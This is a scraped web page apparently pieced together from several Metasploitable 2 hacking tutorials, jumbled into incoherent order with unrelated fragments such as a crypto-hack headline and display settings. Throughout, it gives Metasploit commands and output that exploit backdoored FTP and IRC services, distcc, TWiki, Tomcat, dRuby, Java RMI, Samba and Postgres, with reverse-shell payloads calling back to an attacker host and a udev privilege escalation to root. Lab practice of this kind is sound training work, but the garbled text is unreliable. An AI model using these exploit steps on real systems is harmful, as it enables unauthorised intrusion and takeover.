metasploitable 2 list of vulnerabilities

---- --------------- -------- ----------- Getting access to a system with a writeable filesystem like this is trivial. msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse SRVPORT 8080 yes The local port to listen on. The advantage is that these commands are executed with the same privileges as the application. USERNAME postgres yes The username to authenticate as msf exploit(distcc_exec) > exploit -- ---- msf exploit(udev_netlink) > show options [*] Found shell. PASSWORD => tomcat This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. What is Metasploit? This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. ---- --------------- -------- ----------- msf exploit(twiki_history) > set RHOST 192.168.127.154 [*] Matching msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1. And this is what we get: Then start your Metasploit 2 VM, it should boot now. msf exploit(tomcat_mgr_deploy) > show option root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" followed by a system command to the server on any listening port. Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. [*] Writing to socket B When we performed a scan with Nmap during the scanning and enumeration stage, we saw that ports 21, 22 and 23 are open and running FTP, Telnet and SSH. root. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php.
Name Current Setting Required Description Module options (auxiliary/scanner/smb/smb_version): The applications are installed in Metasploitable 2 in the /var/www directory. Exploit target: This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. Login with the above credentials. THREADS 1 yes The number of concurrent threads It is freely available and can be extended individually, which makes it very versatile and flexible. Name Current Setting Required Description RETURN_ROWSET true no Set to true to see query result sets This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. msf exploit(twiki_history) > show options We are interested in the Victim-Pi or 192.168.1.95 address because that is a Raspberry Pi and the target of our attack. Our attacking machine is the kali-server or 192.168.1.207 Raspberry Pi. RHOSTS yes The target address range or CIDR identifier exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution, msf > use exploit/unix/ftp/vsftpd_234_backdoor -- ---- Id Name The default login and password is msfadmin:msfadmin. [*] Attempting to automatically select a target RPORT 80 yes The target port Compatible Payloads Use the showmount command to see the export list of the NFS server. 0 Automatic Upon a hit, you're going to see something like: After you find the key, you can use this to log in via ssh: as root. msf auxiliary(telnet_version) > show options By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.
I've done exploits from Kali Linux on Metasploitable 2, and I want to fix the vulnerabilities I'm exploiting, but all I can find as a solution to these vulnerabilities is using firewalls or filtering ports. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host Exploit target: Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine. Metasploitable is installed, msfadmin is user and password. Then, hit the "Run Scan" button in the . For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. However the .rhosts file is misconfigured. Step 7: Boot up the Metasploitable2 machine and log in using the default user name and password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. List of known vulnerabilities and exploits. Tutorials on using Mutillidae are available at the webpwnized YouTube Channel. [*] Reading from sockets [*] Reading from sockets In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. Name Current Setting Required Description www-data, msf > use auxiliary/scanner/smb/smb_version Exploit target: I employ the following penetration testing phases: reconnaissance, threat modelling and vulnerability identification, and exploitation. [*] trying to exploit instance_eval A vulnerability in the history component of TWiki is exploited by this module. msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787 In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154.
To make this step easier, both Nessus and Rapid7 NexPose scanners are used to locate potential vulnerabilities for each service. Module options (exploit/unix/ftp/vsftpd_234_backdoor): [*] Accepted the second client connection Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases. ---- --------------- -------- ----------- Now you can do some post-exploitation. PASSWORD no The Password for the specified username [*] Writing to socket A 0 Automatic Target These backdoors can be used to gain access to the OS. The command will return the configuration for eth0. whoami Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. On Metasploitable there were over 60 vulnerabilities, consisting of similar ones to the Windows target. For more information on Metasploitable 2, check out this handy guide written by HD Moore. RHOSTS => 192.168.127.154 0 Linux x86 You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. Now I just started learning about penetration testing; unfortunately now I am facing a problem. I just installed GVM / OpenVAS version 21.4.1 on a VM with Kali Linux 2020.4 installed, and in the other VM I have Metasploitable2 installed. Both VM networks are set to bridged, so they can ping each other because they are on the same network. Enter the required details on the next screen and click Connect. If the application is damaged by user injections and hacks, clicking the "Reset DB" button resets the application to its original state. Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for.
RPORT 23 yes The target port meterpreter > background msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154 A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. There are the following kinds of vulnerabilities in Metasploitable 2: Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. Have you used Metasploitable to practice Penetration Testing? Time for some escalation of local privilege. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack. Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. During that test we found a number of potential attack vectors on our Metasploitable 2 VM. Copyright 2023 HackingLoops All Rights Reserved, nmap -p1-65535 -A 192.168.127.154 msf exploit(vsftpd_234_backdoor) > show options The Metasploit Framework is the most commonly-used framework for hackers worldwide. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. URI => druby://192.168.127.154:8787 The payload is uploaded using a PUT request as a WAR archive comprising a jsp application. RHOSTS yes The target address range or CIDR identifier The vulnerabilities identified by most of these tools extend . A test environment provides a secure place to perform penetration testing and security research. [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] A is input The two dashes then comment out the remaining Password validation within the executed SQL statement. root 2768 0.0 0.1 2092 620 ? : CVE-2009-1234 or 2010-1234 or 20101234) We performed a Nessus scan against the target, and a critical vulnerability on this port is present: rsh Unauthenticated Access (via finger Information). Here are the outcomes. msf exploit(distcc_exec) > show options Exploit target: Exploiting All Remote Vulnerability In Metasploitable - 2. After the virtual machine boots, login to console with username msfadmin and password msfadmin. The same exploit that we used manually before was very simple and quick in Metasploit. nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks RHOSTS yes The target address range or CIDR identifier [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2021-02-06 22:23:23 +0300 Step 1: Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). Armitage is very user friendly. I thought about closing ports but I read it isn't possible without killing processes. [*] Started reverse handler on 192.168.127.159:8888 On July 3, 2011, this backdoor was eliminated. [*] Reading from socket B RHOSTS yes The target address range or CIDR identifier Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. Least significant byte first in each pixel. RPORT 80 yes The target port Nessus, OpenVAS and Nexpose VS Metasploitable. It is a pre-built virtual machine, and therefore it is simple to install. This set of articles discusses the RED TEAM's tools and routes of attack. Id Name We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it: On port 6667, Metasploitable2 runs the UnrealIRCD IRC daemon. Target the IP address you found previously, and scan all ports (0-65535).
An attacker can execute arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. The -e flag is intended to indicate exports: Oh, how sweet! To proceed, click the Next button. Notice that it does not function against Java Management Extension (JMX) ports as they do not allow remote class loading unless some other RMI endpoint is active in the same Java process. [*] Successfully sent exploit request We're not going to go into the web applications here because, in this article, we're focused on host-based exploitation. Vulnerability assessment tools or scanners are used to identify vulnerabilities within the network. Browsing to http://192.168.56.101/ shows the web application home page. Welcome to the MySQL monitor. msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 USERNAME no The username to authenticate as Backdoors - A few programs and services have been backdoored. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. RHOST yes The target address In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. -- ---- ---- --------------- -------- ----------- Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. msf exploit(udev_netlink) > exploit Id Name Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. payload => cmd/unix/interact Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Sources referenced include OWASP (Open Web Application Security Project) amongst others. [*] Scanned 1 of 1 hosts (100% complete) 22. msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink -- ---- Inspired by DVWA, Mutillidae allows the user to change the "Security Level" from 0 (completely insecure) to 5 (secure).
When hacking computer systems, it is essential to know which systems are on your network, but also know which IP or IPs you are attempting to penetrate. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. The purpose of a Command Injection attack is to execute unwanted commands on the target system. What Is Metasploit? msf exploit(java_rmi_server) > show options True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159 We're going to use this exploit: udev before 1.4.1 does not validate if NETLINK message comes from the kernel space, allowing local users to obtain privileges by sending a NETLINK message from user space. msf2 has an rsh-server running and allowing remote connectivity through port 513. Remote code execution vulnerabilities in dRuby are exploited by this module. [*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war VERBOSE false no Enable verbose output 5.port 1524 (Ingres database backdoor ) Before running it, you need to download the pre-calculated vulnerable keys from the following links: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (RSA keys), http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 (DSA keys), ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/. Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state. First let's start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search can be used at the MSF Console prompt.
PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line Use TWiki to run a project development space, a document management system, a knowledge base or any other groupware tool either on an intranet or on the Internet. [*] Attempting to autodetect netlink pid The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. [*] Auxiliary module execution completed, msf > use exploit/unix/webapp/twiki_history Step 2: Vulnerability Assessment. Step 4: Display Database Version. [*] Started reverse double handler Description. I hope this tutorial helped to install metasploitable 2 in an easy way. msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 Learn Ethical Hacking and Penetration Testing Online. TOMCAT_PASS no The Password for the specified username payload => cmd/unix/reverse - Cisco 677/678 Telnet Buffer Overflow .
[*] Started reverse double handler [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' Exploit target: msf exploit(distcc_exec) > set payload cmd/unix/reverse To transfer commands and data between processes, DRb uses remote method invocation (RMI). This allows remote access to the host for convenience or remote administration. It aids the penetration testers in choosing and configuring of exploits. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. msf exploit(udev_netlink) > set SESSION 1 [*] Command: echo f8rjvIDZRdKBtu0F; ================ [*] Reading from sockets At first, open the Metasploit console and go to Applications Exploit Tools Armitage. Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution. Here's a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses the random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. Alternatively, you can also use VMWare Workstation or VMWare Server. Distributed Ruby or DRb makes it possible for Ruby programs to communicate on the same device or over a network with each other. It is also instrumental in Intrusion Detection System signature development. Step 5: Display Database User. How to Use Metasploit's Interface: msfconsole. LHOST => 192.168.127.159 payload => cmd/unix/reverse root You'll need to take note of the inet address.
[*] A is input In the current version as of this writing, the applications are. Metasploit is a penetration testing framework that helps you find and exploit vulnerabilities in systems. :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Accepted the first client connection [*] Accepted the second client connection [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700, root@ubuntu:~# telnet 192.168.99.131 1524, msf exploit(distcc_exec) > set RHOST 192.168.99.131, [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700, uid=1(daemon) gid=1(daemon) groups=1(daemon), root@ubuntu:~# smbclient -L //192.168.99.131, Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian], print$ Disk Printer Drivers, IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), msf > use auxiliary/admin/smb/samba_symlink_traversal, msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131, msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp, msf auxiliary(samba_symlink_traversal) > exploit. It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. [*] Transmitting intermediate stager for over-sized stage(100 bytes) [*] Matching [*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb [*] Command: echo VhuwDGXAoBmUMNcg; In this example, the URL would be http://192.168.56.101/phpinfo.php. Metasploitable 2 offers the researcher several opportunities to use the Metasploit framework to practice penetration testing. msf exploit(tomcat_mgr_deploy) > exploit The Nessus scan showed that the password password is used by the server. Metasploitable 3 is a build-it-on-your-own-system operating system.
However this host has old versions of services, weak passwords and encryptions. We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit. Long list the files with attributes in the local folder. RPORT 1099 yes The target port [*] Started reverse double handler Step 9: Display all the columns fields in the . [*] Reading from socket B This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP).